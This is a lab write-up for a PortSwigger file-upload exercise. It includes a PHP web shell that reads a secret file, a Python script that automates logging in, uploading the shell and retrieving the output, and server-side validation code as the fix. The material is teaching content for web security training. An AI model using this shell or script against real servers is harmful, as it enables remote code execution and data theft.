🗂️PortSwigger Lab Writeup: Remote Code Execution via Web Shell Upload

🎯 Objective
This lab contains an image upload function that performs no validation on uploaded files before storing them on the server's filesystem. The goal is to upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
- Lab URL: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
- Category: File Upload
- Difficulty: Apprentice
🧪 Exploitation Steps
🕵️Step 1: Observe the Website
- First, open the lab URL in your browser and observe what the site does and how it works.


- At first glance, the website is a blog with a login page. The lab description states that we need to exfiltrate carlos's secret.
📝Step 2: Upload the payload
- First, log in with the given credentials wiener:peter to reach the file upload function.
- Now, we can see the file upload function where we can upload an avatar of the user.

- Create a basic PHP web shell named `payload.php` containing the following code:

```php
<?php echo file_get_contents('/home/carlos/secret'); ?>
```

- Now upload this file as your avatar.


- The upload is accepted: the server stores the web shell without checking its extension or contents.
🧑💼Step 3: Access the Secret
- Open the uploaded web shell at `/files/avatars/payload.php`.
- Because the upload directory is served by the web server and .php files are executed there, the server runs our code instead of returning it as a static file, and the response body contains carlos's secret.
- Copy the secret and submit it to complete the lab.

- And Finally, the Lab is solved.
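The three steps above, automated end to end as an added example (this script is not part of the original writeup). It uses only the Python standard library, so the multipart body is built by hand. The endpoints (`/login`, `/my-account`, `/my-account/avatar`, `/submitSolution`), the form field names (`csrf`, `username`, `password`, `user`, `avatar`, `answer`) and the regex for the hidden csrf token are assumptions taken from the lab's HTML forms; check them against the page source before running.

```python
"""Automate the lab: log in, upload payload.php as an avatar, fetch it, submit the secret.
Added example with stdlib only. Endpoints and field names are assumptions from the lab forms."""
import http.cookiejar
import re
import sys
import urllib.parse
import urllib.request
import uuid

SHELL_NAME = "payload.php"
AVATAR_DIR = "/files/avatars/"          # where the lab serves uploaded avatars from
CSRF_RE = re.compile(r'name="csrf"\s+value="([^"]+)"')   # assumed shape of the hidden token


def build_webshell(target_path: str = "/home/carlos/secret") -> bytes:
    """Same minimal payload as the writeup: read one file and echo it."""
    return f"<?php echo file_get_contents('{target_path}'); ?>".encode()


def extract_csrf(html: str) -> str:
    """Lab forms carry a hidden csrf field; fail loudly if it is missing."""
    m = CSRF_RE.search(html)
    if not m:
        raise ValueError("csrf token not found in page")
    return m.group(1)


def multipart(fields: dict, file_field: str, filename: str, content: bytes,
              boundary=None) -> tuple:
    """Hand-built multipart/form-data body. Returns (body_bytes, content_type_header)."""
    boundary = boundary or uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                     f'\r\n\r\n{value}\r\n'.encode())
    parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
                 f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'.encode()
                 + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def shell_url(lab_url: str, filename: str = SHELL_NAME) -> str:
    """URL at which the stored shell will be executed when requested."""
    return urllib.parse.urljoin(lab_url, AVATAR_DIR + filename)


def solve(lab_url: str, username: str = "wiener", password: str = "peter") -> str:
    jar = http.cookiejar.CookieJar()   # keeps the session cookie across requests
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    def get(path: str) -> str:
        return opener.open(urllib.parse.urljoin(lab_url, path)).read().decode()

    def post(path: str, data, content_type: str = "application/x-www-form-urlencoded") -> str:
        body = urllib.parse.urlencode(data).encode() if isinstance(data, dict) else data
        req = urllib.request.Request(urllib.parse.urljoin(lab_url, path), data=body, method="POST")
        req.add_header("Content-Type", content_type)
        return opener.open(req).read().decode()

    # Step 2a: log in as wiener:peter (assumed fields: csrf, username, password)
    post("/login", {"csrf": extract_csrf(get("/login")), "username": username, "password": password})
    # Step 2b: upload the shell through the avatar form (assumed fields: csrf, user, avatar)
    csrf = extract_csrf(get("/my-account"))
    body, ctype = multipart({"csrf": csrf, "user": username}, "avatar", SHELL_NAME, build_webshell())
    post("/my-account/avatar", body, ctype)
    # Step 3: request the stored file; the server executes it and returns the secret
    secret = get(AVATAR_DIR + SHELL_NAME).strip()
    post("/submitSolution", {"answer": secret})   # assumed submission endpoint and field
    return secret


if __name__ == "__main__":
    print(solve(sys.argv[1]))   # usage: python solve.py https://<lab-id>.web-security-academy.net/
```

The file part is sent with `Content-Type: application/octet-stream` on purpose: the lab never looks at it, which is exactly the weakness. If the upload starts being rejected, the first thing to compare against the browser's request is the field names and the csrf token, not the payload.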
🧠 Conclusion
- This lab demonstrated how unvalidated file uploads lead to remote code execution. The application accepted a .php file as an avatar and stored it in a directory the web server both serves and executes scripts from, so requesting the file ran our code and returned a sensitive file.
- The impact is critical: an unrestricted upload combined with an executable upload directory gives an attacker arbitrary code execution as the web server user, and from there typically full compromise of the host.
- Fix: allowlist the extensions the feature actually needs and verify the file contents server-side (magic bytes, or re-encode the image) rather than trusting the client-supplied Content-Type header, which the attacker controls; have the server choose a random filename with the validated extension; store uploads outside the web root and serve them through a handler; and disable script execution in any directory that holds user-supplied files.
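The checks from the fix bullet, written out as an added example (not the lab's own code) so the weak and the stronger validation can be compared on the same inputs. The allowlist, size limit and magic-byte prefixes are assumptions for an avatar feature that only needs PNG, JPEG and GIF; `Verdict`, `weak_check`, `validate_upload` and `stored_name` are names chosen here.

```python
"""Upload validation the way the conclusion recommends. Added example; names and limits are assumptions."""
import os
import secrets
from dataclasses import dataclass

# Allowlist: extension -> (magic-byte prefix, expected MIME type). Nothing else is ever stored.
ALLOWED = {
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg":  (b"\xff\xd8\xff",      "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff",      "image/jpeg"),
    "gif":  (b"GIF8",              "image/gif"),
}
MAX_BYTES = 2 * 1024 * 1024   # assumed limit for an avatar


@dataclass
class Verdict:
    ok: bool
    reason: str
    ext: str = ""


def weak_check(filename: str, content_type: str) -> bool:
    """The check many apps add first: trust the client's Content-Type header.
    The attacker sets that header freely, so payload.php sails through."""
    return content_type.startswith("image/")


def validate_upload(filename: str, content_type: str, data: bytes) -> Verdict:
    """Server-side validation: size, exactly one allowlisted extension, content that matches it."""
    if len(data) > MAX_BYTES:
        return Verdict(False, "too large")
    base = os.path.basename(filename)          # drop any directory component (../../)
    parts = base.lower().split(".")
    # Exactly one extension: rejects "avatar.php.png" (some Apache configs execute it
    # via the secondary extension) and dotfiles such as ".htaccess".
    if len(parts) != 2 or not parts[0]:
        return Verdict(False, "unexpected filename shape")
    ext = parts[1]
    if ext not in ALLOWED:
        return Verdict(False, f"extension .{ext} not allowed")
    magic, mime = ALLOWED[ext]
    if not data.startswith(magic):              # the bytes, not the name, decide what it is
        return Verdict(False, "content does not match extension")
    if content_type != mime:                    # consistency check only, never a trust anchor
        return Verdict(False, "declared type does not match extension")
    return Verdict(True, "ok", ext)


def stored_name(verdict: Verdict) -> str:
    """The server, not the client, picks the on-disk name: random, with the validated extension."""
    return f"{secrets.token_hex(16)}.{verdict.ext}"


def store(upload_root: str, verdict: Verdict, data: bytes) -> str:
    """Write under a directory outside the web root; the app serves it later by reading the
    file and setting the Content-Type itself, so a URL never maps straight onto the upload."""
    path = os.path.join(upload_root, stored_name(verdict))
    with open(path, "wb") as f:
        f.write(data)
    return path


if __name__ == "__main__":
    shell = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
    print("weak check accepts payload.php:", weak_check("payload.php", "image/png"))
    print("hardened check:", validate_upload("payload.php", "image/png", shell))
```

A magic-byte check alone does not stop a polyglot (a valid PNG with PHP appended), which is why the random server-chosen name, the storage location outside the web root and the no-execution rule for the upload directory are layered on top: even if a malicious file is stored, there is no URL under which the interpreter runs it.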